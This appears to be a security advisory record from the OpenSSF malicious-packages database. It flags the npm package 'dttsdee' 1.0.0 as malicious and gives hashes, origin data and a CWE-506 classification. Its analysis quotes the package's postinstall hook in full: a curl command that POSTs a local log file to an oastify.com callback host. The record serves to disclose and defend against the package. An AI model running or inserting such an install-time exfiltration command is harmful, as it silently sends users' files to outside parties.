-= Per source details. Do not edit below this line.=-
package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$(cat /data/logs/monitor-2026-06-25.log)" http://3dhd6wwmusbh04m22igmzvb4hvnmblza.oastify.com/data. The hook reads a file from the installer's filesystem and POSTs its contents over cleartext HTTP to an attacker-controlled subdomain on oastify.com (Burp Suite's Collaborator out-of-band callback service, commonly used for data exfiltration and SSRF research). The package advertises itself as a string-utility library (easy-string-kit in source) but is published under the unrelated name dttsdee with empty author/repository/homepage/bugs metadata; the innocuous string-helper code in index.js is cover for the install-time exfiltration. The combination of generic placeholder metadata, mismatched name/internal-description, and an automatic OOB exfil beacon on a researcher/attacker callback domain is a throwaway malicious package (likely dependency-confusion PoC or active attack).
The OpenSSF Package Analysis project identified 'dttsdee' @ 1.0.0 (npm) as malicious.
It is considered malicious because:
The package communicates with a domain associated with malicious activity.
The package executes one or more commands associated with malicious behavior.
{
"malicious-packages-origins": [
{
"sha256": "4c2da603726677a712bcd1e3ce798e5b3f2eed115827085596589c40613e9ad6",
"import_time": "2026-06-25T11:27:35.79112341Z",
"modified_time": "2026-06-25T10:51:03Z",
"source": "ossf-package-analysis",
"versions": [
"1.0.0"
]
},
{
"source": "amazon-inspector",
"sha256": "56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9",
"import_time": "2026-06-25T16:23:39.779247729Z",
"modified_time": "2026-06-25T16:09:34Z",
"id": "IN-MAL-2026-007509",
"versions": [
"1.0.0"
]
}
]
}[
{
"cweId": "CWE-506",
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature."
}
]
{
"package_integrity": [
{
"filename": "dttsdee-1.0.0.tgz",
"hashes": {
"sha1": "9a2690c9c1114761471480c87e47edaf373ce012",
"sha512_sri": "sha512-GClNgEVcW5emUn5hrcTYpjiZcQTj/MWhS4L+9z98i4CA9cwE3S9e8O761lYczdp2uXat6sbnJjTiUQbsZwVFhg=="
}
}
],
"evidence_files": [
{
"tlsh": "4c01cb18c6745d3315d86b30bdab0a42b112ae5709043c0977c3812c0faf7af51fe62d",
"sha256": "f191101d2692e8d9f0e8cf68bff87e14075ee3c658c4388ab45a1849ebfc9210",
"path": "package.json"
}
]
}
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/dttsdee/MAL-2026-6462.json"